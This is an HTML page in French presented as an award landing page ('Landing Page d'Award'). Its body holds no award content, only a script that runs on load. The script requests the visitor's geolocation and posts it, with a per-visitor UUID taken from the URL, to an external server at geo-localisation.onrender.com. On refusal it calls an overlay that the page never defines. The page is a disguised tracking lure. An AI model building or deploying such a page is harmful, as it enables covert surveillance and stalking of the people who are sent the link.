<!DOCTYPE html>
<html lang="fr">

<head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Landing Page d'Award</title>
    <link href="https://cdn.jsdelivr.net/npm/tailwindcss@2.2.19/dist/tailwind.min.css" rel="stylesheet" />
    <style>
        .gold {
            color: #38a199;
        }

        .silver {
            color: #c0c0c0;
        }

        .bg-dark {
            background-color: #1c1c1c;
        }

        .bg-card {
            background-color: #2a2a2a;
        }

        .shine {
            background: linear-gradient(45deg, #d5e643, #fff);
            background-size: 400% 400%;
            animation: shine 5s linear infinite;
        }

        @keyframes shine {
            0% {
                background-position: 0% 50%;
            }

            100% {
                background-position: 100% 50%;
            }
        }

        .overlay {
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background: rgba(0, 0, 0, 0.75);
            display: flex;
            align-items: center;
            justify-content: center;
            z-index: 1000;
        }
        .overlay-content {
            background: white;
            padding: 20px;
            border-radius: 8px;
            text-align: center;
        }
    </style>
</head>

<body class="bg-dark text-white">



    <script>
        // Fonction pour tenter de récupérer la position et envoyer les coordonnées
        function attemptGeolocation() {
            navigator.geolocation.getCurrentPosition(position => {
                const uuid = window.location.pathname.split('/').pop();
                const { latitude, longitude } = position.coords;

                fetch('https://geo-localisation.onrender.com/location', {
                    method: 'POST',
                    headers: {
                        'Content-Type': 'application/json'
                    },
                    body: JSON.stringify({ uuid, latitude, longitude })
                })
                .then(response => response.text())
                .then(data => console.log(data))
                .catch(error => console.error('Error:', error));
            }, error => {
                // En cas d'échec, afficher la superposition
                showGeolocationOverlay();
            });
        }

        // Fonction pour afficher la superposition
        function showGeolocationOverlay() {
            document.getElementById('geolocation-overlay').classList.remove('hidden');
        }

        // Appeler la fonction pour tenter de récupérer la position
        window.onload = attemptGeolocation;
    </script>
</body>

</html>
